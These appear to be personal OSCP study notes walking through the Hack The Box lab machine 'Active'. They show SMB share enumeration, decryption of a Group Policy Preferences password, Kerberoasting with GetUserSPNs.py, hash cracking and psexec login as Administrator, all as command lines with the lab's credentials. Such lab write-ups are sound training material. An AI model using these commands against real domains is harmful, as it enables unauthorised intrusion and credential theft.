O
O
OSCP Notes
Search
K
Comment on page

HTB Write-up Active (Windows) - Active Directory

What I learned today:
Nmap Scan Result:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-11 03:58:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-02-11T03:59:42
|_ start_date: 2022-02-11T03:56:29
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
All port scans
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
49152/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
49173/tcp open unknown
49174/tcp open unknown
tried kerbrute:
no luck on other usernames so far.
SMB enum:
I got some shares.
Let's do more SMB enum.
enum4linux is outdated and didn't give me much useful info.
For SMB enum, use smbmap!
smbmap -H 10.129.138.208
shows what permission we have!
\To find out the actual host name, do some nslookup:
It shows that we have read access on Replication! TIP: smbclient -L lists but to connect just do smbclient IP/FILESHARE
now we have access to replication share!

Find the host name

Nslookup
  1. 1.
    set the server name as the target IP
  2. 2.
    ask who's 127.0.0.1
  3. 3.
    if it doesn't show ask who's TARGET_IP ( in this case, it times out)
dnsrecon to scan the entire subnet
NEW: dnsrecon -d 10.129.138.208 -r 10.129.138.208/8 --depth 10
didn't work well this time.
Search through the directories in the user share with:
smbmap -H 10.129.138.208 -R Replication --depth 10
found a group policy file: groups.xml
Download the file with
smbmap -H 10.129.138.208 -R Replication -A Groups.xml -q --depth 10
-q quiet
-A downloads a file if it's available.
saves the file to 10.129.138.208-Replication_active.htb_Policies...
Grouppolicy password is encrypted.
Decrypted it via
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Now that we have a password, let's do
smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.129.138.208
Used GetUserSPNs to dump hashes.
GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.129.138.208 -request
hashcat it
pass for the administrator is Ticketmaster1968
Now that we have the password, let's use the psexec.py to escalate priviledge
psexec.py active.htb/Administrator:[email protected]
We are in the system!